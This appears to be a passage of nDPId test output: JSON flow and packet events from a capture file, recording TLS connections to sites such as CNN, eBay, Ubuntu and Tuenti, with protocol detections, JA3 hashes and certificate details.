-01479{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":348,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4125,"flow_avg_l4_payload_len":687,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"vevo.com","server_names":"*.cache.vevo.com,*.cache.vevodev.com,*.cache.vevoprd.com,*.cache.vevostg.com,*.vevodev.com,*.vevoprd.com,*.vevostg.com,stg.vevo.ly,vevo.com,vevo.ly,vevo.pl,vevo.tv,vevoapi.com,vevocdn.com,vevolive.tv,vevosubmit.com,www.vevo.ly,www.vevo.pl,*.vevo.com,*.vevo.ly,*.vevo.pl,*.vevo.tv,*.vevoapi.com,*.vevocdn.com,*.vevolive.tv,*.vevosubmit.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.cache.vevo.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"ED:55:58:0E:19:94:FE:95:93:86:88:FE:30:27:DF:43:EB:74:17:C2"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482753482,"flow_last_seen":1646482753482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482753482,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1646482753482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753482,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SaBAAEAG1aPAqAGAFwFCT7wMAbtaGHg4AAAAAKAC+vA\/9AAAAgQFtAQCCAr10Gu5AAAAAAEDAwc="} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1646482753504,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753504,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJkQXAUJPwKgBgAG7vAwZG5KKWhh4OaAS\/ogYMwAAAgQFtAQCCApuzQml9dBruQEDAwc="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1646482753507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482753507,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SaJAAEAG06TAqAGAFwFCT7wMAbtaGHg5GRuSi4AYAfZqJAAAAQEICvXQa9NuzQmlFgMBAgABAAH8AwOUyHhinsfe9G2IXNgY9L7xAzZ+DjB199btap4Cw89cViDuti6QLvXTxzS8GPAI\/LqrruRicKAVDOLPOdfZnGvHHQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtjZG4uY25uLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCyATmKdF69bnRwMVBRd98tu612XdMkfb0+p4HzFN6fBwAXAEEE+SEvSVfUiTeIP8IKKsjphsMZuVwTWztloapho\/r89Lhgv68xO7BDbwW8nmN\/dVf8z\/v3pQVdFakWyi7cuNIpiwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482753482,"flow_last_seen":1646482753507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482753507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482753526,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482759960,"flow_last_seen":1646482759960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482759960,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1646482759960,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759960,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N8NAAEAGsY7AqAGAAhGNMZ+AAbsz0CpkAAAAAKAC+vAbqAAAAgQFtAQCCApTrIzgAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1646482759979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759979,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8VECEY0xwKgBgAG7n4Axx0rTM9AqZaAS\/ogIXwAAAgQFtAQCCAq1xN1AU6yM4AEDAwc="} 
-01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1646482759982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482759982,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5N8VAAEAGr4\/AqAGAAhGNMZ+AAbsz0CplMcdK1IAYAfb4fgAAAQEIClOsjPe1xN1AFgMBAgABAAH8AwO90p\/YrOJd\/Z4tss7jqktThIJxJIB3e+qrLLFobtKKlyAX6YhgDO5LSOYTxZN2IGu+QsQ1WdlQy7VgjD2lE+VvBgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAx3d3cuZWJheS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgf8Mv24G6SSqxNEfrqm7W\/bejLWA6OGSZmHTWefPpxiwAFwBBBD+GtRBdEP9fCUeld\/IGhJTQe0q9+sY1uU3D5mNCoqM6EROqE0XBEIsVt1XPe0XwL5d6JRvhBZsY2OXTwlPA9KoAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482759960,"flow_last_seen":1646482759982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482759982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":358,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482760002,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482772264,"flow_last_seen":1646482772264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482772264,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1646482772264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772264,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SfdAAEAGtwnAqAGAuX2+FaeEAbviQ3M+AAAAAKAC+vAD2AAAAgQFtAQCCAo3btlLAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1646482772292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772292,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADcGCgG5fb4VwKgBgAG7p4RVAzgX4kNzP6AS\/ogvJwAAAgQFtAQCCAoh0SIcN27ZSwEDAwc="} -01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1646482772294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482772294,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SflAAEAGtQrAqAGAuX2+FaeEAbviQ3M\/VQM4GIAYAfaY1QAAAQEICjdu2Woh0SIcFgMBAgABAAH8AwMB8bRCQdqcx9fui+mF7VjuHN5SBb79arjGU4qYGthMOSBbTABCg135wJeFEPl+a8Oxzav9AsC9J9+l+IIaNAxYkQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFhc3NldHMudWJ1bnR1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCezVQBlUDf2SIx8m1xehLWY9pQKyvfH068Wwzre\/JcNwAXAEEEo09VNt2RkHEqlhHBw1nk6JbOlFIOJqgyxElu\/vwC+3XCJEwr43v+9rwXwcTyZXa+qtiIur9f6O0kVe2u0AJzEQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482772264,"flow_last_seen":1646482772294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482772294,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482772325,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482785304,"flow_last_seen":1646482785304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482785304,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1646482785304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785304,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8c2NAAEAG\/FHAqAGAX4OpW8gwAbszoGaBAAAAAKAC+vB9ogAAAgQFtAQCCArCJt4xAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1646482785347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785347,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGfbVfg6lbwKgBgAG7yDD0fDnYM6BmgqASOJCOBAAAAgQFtAQCCAoi\/WCZwibeMQEDAwk="} 
-01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1646482785351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482785351,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5c2VAAEAG+lLAqAGAX4OpW8gwAbszoGaC9Hw52YAYAfYZoQAAAQEICsIm3l8i\/WCZFgMBAgABAAH8AwNK0euZMFtaCNBtu+eL8QS+C1QwW1wzikaweB9ZeLN7jCCkdWD5KYTe5rYj3sVQQUUDDmKS7Ul8Bkz8dJPsZBeSHgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAAp0dWVudGkuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIJK5tprzoOfSjZ23KXMf08y5udMKZfRYOXHDalLyYQBZABcAQQRLZU+TiBidby\/7mJhjeaCEAZfIl\/ESg4w9XgdOmdSs6KJ9\/6C1zE6e09432pgZPLx5qZNVUeHl8Lum72bGeXBPACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482785304,"flow_last_seen":1646482785351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482785351,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482786097,"flow_last_seen":1646482786097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482786097,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1646482786097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786097,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8MYNAAEAGPTLAqAGAX4OqW5mGAbs4G85LAAAAAKAC+vAJ+AAAAgQFtAQCCApUK4E8AAAAAAEDAwc="} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1646482786139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786139,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfbVfg6pbwKgBgAG7mYaAJv+vOBvOTKASOJA3NAAAAgQFtAQCCAojEPIqVCuBPAEDAwk="} -01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1646482786140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482786140,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5MYVAAEAGOzPAqAGAX4OqW5mGAbs4G85MgCb\/sIAYAfY7ugAAAQEIClQrgWcjEPIqFgMBAgABAAH8AwPCuINo9aszS1NOKEJoT\/qcXc1z2+SkMYjVWEN9Dzm1uCAc1Fe\/tF+S3TB+puhQn5k1kl\/SrZE1Zu7DG17b6iPYkAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFzdGF0aWMudHVlbnRpLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAO0kbEPJvFV01Owk3nxVpBPAsVRMhGqyVHONxZeCXXCAAXAEEEdYt+qtkVgPe4ucZXkNkiZFAQTN50kMr6BFmQ8vGiT4E\/aWy5wxXrEUez6C+lutJauRk\/zdA9y71YXWyeYxHbNwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA